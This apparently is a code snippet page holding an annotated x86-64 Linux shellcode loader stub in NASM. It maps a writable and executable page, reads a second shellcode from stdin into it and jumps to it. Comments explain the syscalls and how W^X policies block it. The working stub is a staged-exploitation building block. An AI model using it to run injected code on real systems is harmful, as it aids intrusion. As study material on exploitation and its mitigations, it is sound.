Created
December 4, 2018 15:09
x86-64 shellcode to read another shellcode from stdin and execute it
| BITS 64 | |
| ; Loader stub in NASM syntax using raw Linux x86-64 syscalls. | |
| ; Flow: mmap one 4096-byte anonymous private page with read, write and | |
| ; execute permission, read() up to 4096 bytes from fd 0 (stdin) into it, | |
| ; then transfer control to the start of that page with `call rsi`. | |
| ; | |
| ; Raw syscall convention used below: rax = syscall number; arguments in | |
| ; rdi, rsi, rdx, r10, r8, r9; result in rax; `syscall` clobbers rcx and r11. | |
| ; | |
| ; NOTE(review): neither syscall result is checked. A failed mmap leaves a | |
| ; negative errno value in rax, which is then used as the read() buffer and | |
| ; as the call target; a failed or empty read() still reaches `call rsi`. | |
| ; | |
| ; Defensive view: the page is writable and executable at the same time | |
| ; (W^X violation). The sequence mmap(prot=7, flags=0x22) -> read() into the | |
| ; mapping -> indirect call into it is visible to syscall auditing, and | |
| ; policies that refuse writable+executable anonymous mappings (SELinux | |
| ; execmem, a seccomp filter on the mmap prot argument, systemd | |
| ; MemoryDenyWriteExecute=) stop the stub at its first syscall. | |
| ; | |
| ; ---- syscall 1 ------------------------------------------------------- | |
| ; ptr = mmap(NULL, size, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0) | |
| ; | |
| ; 1. argument: rdi = NULL (kernel chooses the address) | |
| ; 2. argument: rsi = 4096 (0x1000, the mapping length) | |
| ; 3. argument: rdx = 7 (PROT_READ | PROT_WRITE | PROT_EXEC) | |
| ; 4. argument: r10 = 34 (0x22 = MAP_PRIVATE | MAP_ANONYMOUS) | |
| ; 5. argument: r8 = -1 (no backing file descriptor) | |
| ; 6. argument: r9 = 0 (offset) | |
| ; | |
| ; syscall sys_mmap: rax = 9 | |
| xor rdi, rdi | |
| mov rsi, 0x1000 | |
| mov rdx, 0x7 | |
| mov r10, 0x22 | |
| ; r8 = 0 followed by dec gives the full 64-bit -1 (0xffffffffffffffff). | |
| ; The disabled alternative below would zero-extend, leaving r8 = | |
| ; 0x00000000ffffffff. | |
| xor r8, r8 | |
| ;mov r8d,0xffffffff | |
| dec r8 | |
| xor r9, r9 | |
| mov rax, 9 | |
| syscall | |
| ; On return rax holds the mapping address, or a negative errno on failure | |
| ; (not checked, see NOTE(review) at the top). | |
| ; | |
| ; ---- syscall 2 ------------------------------------------------------- | |
| ; read(fd, *buf, count) | |
| ; | |
| ; 1. argument: rdi = stdin = 0 (still 0 from the mmap setup; the | |
| ; syscall instruction does not modify rdi) | |
| ; 2. argument: rsi = mmap buffer address | |
| ; 3. argument: rdx = 4096 | |
| ; | |
| ; syscall sys_read: rax = 0 | |
| ; | |
| ; The xchg moves the length 0x1000 from rsi into rdx (count); the value it | |
| ; leaves in rsi (7) is dead because the next instruction overwrites rsi | |
| ; with the mmap result. | |
| xchg rsi, rdx | |
| mov rsi, rax | |
| xor rax, rax | |
| syscall | |
| ; rax now holds the byte count or a negative errno; it is ignored. | |
| ; Control moves to the start of the page whatever read() returned; a fresh | |
| ; anonymous mapping is zero-filled, so after a failed or empty read the | |
| ; call lands on zero bytes. Nothing follows the call in this file, so | |
| ; there is no defined continuation if the called code returns. | |
| call rsi |